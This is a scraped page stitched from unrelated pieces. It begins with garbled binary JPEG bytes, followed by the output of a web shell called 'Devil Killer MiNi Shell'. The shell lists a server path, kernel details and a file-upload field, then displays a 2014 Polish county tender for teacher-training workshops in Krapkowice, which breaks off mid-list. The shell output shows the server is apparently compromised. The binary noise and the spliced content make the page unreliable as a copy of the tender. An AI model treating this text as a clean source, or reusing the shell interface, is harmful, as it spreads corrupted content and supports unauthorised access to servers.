JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141114/375666-N-2014.html

<p class="kh_header"><b>Krapkowice: Prowadzenie przez ekspertów, w roku szkolnym 2014/2015, warsztatów, wykładów tematycznych, konsultacji podczas realizacji projektu pn. Kompleksowe wspomaganie szkół i przedszkoli w zakresie doskonalenia nauczycieli w powiecie krapkowickim</b><br>
<b>Numer ogłoszenia: 375666 - 2014; data zamieszczenia: 14.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Krapkowicach , ul. Kilińskiego 1, 47-303 Krapkowice, woj. opolskie, tel. 77 4074300, faks 77 4074332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkrapkowicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie przez ekspertów, w roku szkolnym 2014/2015, warsztatów, wykładów tematycznych, konsultacji podczas realizacji projektu pn. Kompleksowe wspomaganie szkół i przedszkoli w zakresie doskonalenia nauczycieli w powiecie krapkowickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Zamawiający podzielił przedmiot zamówienia na 16 części:
2.1.1	w zakresie części od I do XII: Przeprowadzenie w okresie od dnia zawarcia umowy do 15 maja 2015 r. warsztatów, wykładów tematycznych, konsultacji grupowych oraz konsultacji indywidualnych:
Część I - Budowa koncepcji pracy szkoły w 2 szkołach ogółem 44 godziny w tym 16 godzin zajęć w formie warsztatów, (2x4 godz. w 2014 r. oraz 2x4 godz. w 2015r.) 8 godzin w formie wykładów tematycznych (2x4godz. w 2015 r.), 12 godzin konsultacji grupowych (2x3 godz. w 2014 r. oraz 2x3 godz. w 2015 r.) 8 godzin konsultacji indywidualnych (2x2 godz. w 2014 r. oraz 2x2 godz. w 2015 r.)
Część II - Nauczyciel 45+ w 7 szkołach ogółem 154 godzin w tym 56 godzin zajęć w formie warsztatów, (7x4 godz. w 2014 r. oraz 7x4 godz. w 2015r.) 28 godzin w formie wykładów tematycznych (7x4godz. w 2015 r.), 42 godzin konsultacji grupowych (7x3 godz. w 2014 r. oraz 7x3 godz. w 2015 r.) 28 godzin konsultacji indywidualnych (7x2 godz. w 2014 r. oraz 7x2 godz. w 2015 r.)
Część III - Wykorzystanie TIK na zajęciach edukacyjnych- bezpieczny internet w 1 szkole ogółem 30 godziny w tym 16 godzin zajęć w formie warsztatów (2x4 godz. w 2014 r. oraz 2x4 godz. w 2015r.), 4 godzin w formie wykładów tematycznych (1x 4godz. w 2015 r.), 6 godzin konsultacji grupowych (1 x3 godz. w 2014 r. oraz 1 x3 godz. w 2015 r.) 4 godzin konsultacji indywidualnych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015 r.)
Część IV- Praca z uczniem zdolnym w 1 szkole ogółem 22 godziny w tym 8 godzin zajęć w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015r.), 4 godzin w formie wykładów tematycznych (1x 4godz. w 2015 r.), 6 godzin konsultacji grupowych (1 x3 godz. w 2014 r. oraz 1 x3 godz. w 2015 r.) 4 godzin konsultacji indywidualnych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015 r.)
Część V- Efektywna organizacja  pracy zespołów nauczycielskich w 3 szkołach ogółem 66 godziny w tym 24 godzin zajęć w formie warsztatów (3x4 godz. w 2014 r. oraz 3x4 godz. w 2015r.), 12 godzin w formie wykładów tematycznych (3x 4godz. w 2015 r.), 18 godzin konsultacji grupowych (3 x3 godz. w 2014 r. oraz 3 x3 godz. w 2015 r.) 12 godzin konsultacji indywidualnych (3x2 godz. w 2014 r. oraz 3x2 godz. w 2015 r.)
Część VI - Postawy uczniowskie. Jak je kształtować? w 1 szkole ogółem 22 godziny w tym 8 godzin zajęć w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015r.), 4 godzin w formie wykładów tematycznych (1x 4godz. w 2015 r.), 6 godzin konsultacji grupowych (1 x3 godz. w 2014 r. oraz 1 x3 godz. w 2015 r.) 4 godzin konsultacji indywidualnych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015 r.)
Część VII - Współpraca nauczycieli w prowadzeniu procesów edukacyjnych w 1 szkole ogółem 22 godziny w tym 8 godzin zajęć w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015r.), 4 godzin w formie wykładów tematycznych (1x 4godz. w 2015 r.), 6 godzin konsultacji grupowych (1 x3 godz. w 2014 r. oraz 1 x3 godz. w 2015 r.) 4 godzin konsultacji indywidualnych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015 r.)
Część VIII - Rodzice są partnerami szkoły w 1 szkole  ogółem 22 godziny w tym 8 godzin zajęć w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015r.), 4 godzin w formie wykładów tematycznych (1x 4godz. w 2015 r.), 6 godzin konsultacji grupowych (1 x3 godz. w 2014 r. oraz 1 x3 godz. w 2015 r.) 4 godzin konsultacji indywidualnych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015 r.)
Część IX - Wykorzystanie EWD w ewaluacji wewnętrznej szkoły w 3 szkołach ogółem 74 godziny w tym 32 godziny zajęć w formie warsztatów (4x4 godz. w 2014 r. oraz 4x4 godz. w 2015r.), 12 godzin w formie wykładów tematycznych (3x 4godz. w 2015 r.), 18 godzin konsultacji grupowych (3 x3 godz. w 2014 r. oraz 3 x3 godz. w 2015 r.) 12 godzin konsultacji indywidualnych (3x2 godz. w 2014 r. oraz 3x2 godz. w 2015 r.)
Część X - Techniki uczenia się i metody motywujące do nauki w  1 szkole ogółem 22 godziny w tym 8 godzin zajęć w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015r.), 4 godzin w formie wykładów tematycznych (1x 4godz. w 2015 r.), 6 godzin konsultacji grupowych (1 x3 godz. w 2014 r. oraz 1 x3 godz. w 2015 r.) 4 godzin konsultacji indywidualnych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015 r.)
Część XI - Ocenianie kształtujące w 4 szkołach  ogółem 112 godzin w tym 56 godzin zajęć w formie warsztatów (7x4 godz. w 2014 r. oraz 7 x4 godz. w 2015r.), 16 godzin w formie wykładów tematycznych (4x 4godz. w 2015 r.), 24 godzin konsultacji grupowych (4 x3 godz. w 2014 r. oraz 4 x3 godz. w 2015 r.) 16 godzin konsultacji indywidualnych (4 x 2 godz. w 2014 r. oraz 4 x 2 godz. w 2015 r.)
Część XII- Jak pomóc uczniowi osiągnąć sukces edukacyjny? w 4 szkołach  ogółem 88 godzin w tym 32godziny zajęć w formie warsztatów (4x4 godz. w 2014 r. oraz 4x4 godz. w 2015r.), 16 godzin w formie wykładów tematycznych (4x 4godz. w 2015 r.), 24 godzin konsultacji grupowych (4 x3 godz. w 2014 r. oraz 4 x3 godz. w 2015 r.) 16 godzin konsultacji indywidualnych (4 x 2 godz. w 2014 r. oraz 4 x 2 godz. w 2015 r.)
2.1.2.	w zakresie części od XIII do XVI: Przeprowadzenie w okresie od dnia zawarcia umowy do 15 maja 2015 r. warsztatów, wykładów tematycznych, konsultacji grupowych:
Część X - Rola Dyrektora w promocji i budowaniu wizerunku szkoły ogółem 8 godzin w formie warsztatów (1x4 godz. w 2013 r. oraz 1x4 godz. w 2014 r.), 4 godz. wykładów tematycznych (1x3 godz. w 2014 r.), 4 godz. konsultacji grupowych (1x2 godz. w 2013 r. oraz 1x2 godz. w 2014 r.)
Część XIII - Rola Dyrektora w promocji i budowaniu wizerunku szkoły z uwzględnieniem prawa oświatowego ogółem 16 godzin w tym 8 godzin w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015 r.), 4 godz. wykładów tematycznych (1x4 godz. w 2015 r.), 4 godz. konsultacji grupowych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015  r.)
Część XIV - Skuteczne sposoby zachęcania uczniów do czytania ogółem 16 godzin w tym 8 godzin w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015 r.), 4 godz. wykładów tematycznych (1x4 godz. w 2015 r.), 4 godz. konsultacji grupowych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015  r.)
Część XV - Doświadczenie i eksperymenty na zajęciach przedmiotów przyrodniczych
ogółem 16 godzin w tym 8 godzin w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015 r.), 4 godz. wykładów tematycznych (1x4 godz. w 2015 r.), 4 godz. konsultacji grupowych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015  r.)
Część XVI - Wspieranie pracy nauczycieli języków obcych w edukacji wczesnoszkolnej ogółem 16 godzin w tym 8 godzin w formie warsztatów (1x4 godz. w 2014 r. oraz 1x4 godz. w 2015 r.), 4 godz. wykładów tematycznych (1x4 godz. w 2015 r.), 4 godz. konsultacji grupowych (1x2 godz. w 2014 r. oraz 1x2 godz. w 2015  r.)
3.	Wymagania szczegółowe związane z przedmiotem zamówienia
3.1.	W ramach każdej części Wykonawca zobowiązany jest do:
3.1.1.	opracowania programu zajęć oraz opracowania i udostępnienia uczestnikom materiałów szkoleniowych, zgodnie z RPW po akceptacji SORE na 5 dni przed szkolenie
3.1.2.	współpracy ze Szkolnym Organizatorem Rozwoju Edukacji (SORE) i Koordynatorem sieci w zakresie organizacji spotkań,
3.1.3.	prowadzenia dokumentacji zajęć w sposób zgodny z wymogami Zamawiającego.
3.1.4.	zapewnienia trenerów, szkoleniowców, wykładowców, konsultantów, ekspertów w danych dziedzinach w ramach wybranej oferty,
3.1.5.	prowadzenia spotkań w terminach ustalonych przez SORE/Koordynatorów sieci, w konsultacji z koordynatorem projektu;
3.1.6.	zachowania w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia; 
3.1.7.	zorganizowania sprzętu i wszelkich pomocy dydaktycznych niezbędnych do realizacji zadania na swój własny koszt; 
3.1.8.	przekazania uczestnikom materiałów szkoleniowych, dydaktycznych związanych z realizowanym wsparciem najpóźniej w dniu szkolenia. Przekazywane materiały muszą być sporządzone w sposób czytelny. 
3.2.	Zamawiający zastrzega, że spotkania w ramach poszczególnych części, a także w ramach jednej części dla różnych grup mogą odbywać się w tym samym terminie, dlatego też Wykonawca zobowiązany jest dysponować kadrą obejmującą liczbę ekspertów wskazaną w siwz.
3.3.	Ze względu na finansowanie ze środków Europejskiego Funduszu Społecznego, Wykonawca zobowiązany jest umieszczać informacje o realizowaniu szkolenia finansowanego z funduszy europejskich na wszystkich dokumentach związanych z organizacją szkolenia takich jak: harmonogram szkolenia, listy obecności, itp. oraz w ten sam sposób oznakować miejsce prowadzenia szkolenia. Zamawiający dostarczy wykonawcy logotypy i instrukcję w jaki sposób oznakowane powinny być materiały szkoleniowe. Wykonawca zobowiązany jest do zapewnienia warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia. Termin zajęć będzie ustalony przed podpisaniem umowy z Wykonawcą.
3.4.	Grupa docelowa: nauczyciele oraz dyrektorzy publicznych szkół oraz przedszkoli Powiatu Krapkowickiego.
3.5.	Liczba grup: 29 Rad pedagogicznych i 4 sieci współpracy.
3.6.	Liczba godzin: Łączna liczba godzin szkoleniowych 742 godziny; w roku szkolnym 2014/2015 będzie wynosić 678 godzin - średnio 22 godziny/grupa oraz 64 godziny - 16 godzin/sieć. (4 sieci)
3.7.	Dokładne terminy spotkań zostaną przedstawione przez zamawiającego najpóźniej na 7 dni przed planowanymi zajęciami.
3.8.	Świadczenie usługi odbywać się będzie według wyboru Zamawiającego w jego siedzibie albo w szkołach/przedszkolach biorących udział w projekcie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 1 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, to w tym okresie, wykonał co najmniej jedną usługę szkoleniową dla nauczycieli o wartości nie mniejszej niż 5.000 zł. brutto bez względu na ilość części. W celu potwierdzenia spełniania tego warunku Wykonawca załączy do oferty wykaz wykonanych usług - załącznik Nr 3 do siwz, dla każdej części na którą składa ofertę</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 1 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
W CZĘŚCI I
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiadają:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadziła co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI II
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 3 ekspertami - osobami zdolnymi do wykonania zamówienia, które spełniają poniższe warunki, tj. posiadają:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadzili co najmniej 2 warsztaty związane tematycznie z częścią do której przystępują.
W CZĘŚCI III
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI IV
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI V
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 2 ekspertami - osobami zdolnymi do wykonania zamówienia, które spełniają poniższe warunki, tj. posiadają:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadzili co najmniej 2 warsztaty związane tematycznie z częścią do której przystępują.
W CZĘŚCI VI
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadziła co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI VII
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI VIII
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI IX
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI X
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI XI
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 2 ekspertami - osobami zdolnymi do wykonania zamówienia, które spełniają poniższe warunki, tj. posiadają:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadziły co najmniej 2 warsztaty związane tematycznie z częścią do której przystępują.
W CZĘŚCI XII
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 2 ekspertami - osobami zdolnymi do wykonania zamówienia, które spełniają poniższe warunki, tj. posiadają:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadziły co najmniej 2 warsztaty związane tematycznie z częścią do której przystępują.
W CZĘŚCI XIII
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI XIV
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI XV
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W CZĘŚCI XVI
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje co najmniej 1 ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj. posiada:
1)	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
2)	co najmniej 3 - letnie doświadczenie w pracy z osobami dorosłymi, 
3)	doświadczenie w pracy na stanowisku nauczyciela,
4)	przeprowadził co najmniej 2 warsztaty związane tematycznie z częścią do której przystępuje.
W celu potwierdzenia spełniania tego warunku Wykonawca załączy do oferty wykaz osób - załącznik Nr 2 do siwz, dla każdej części na którą składa ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 1 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
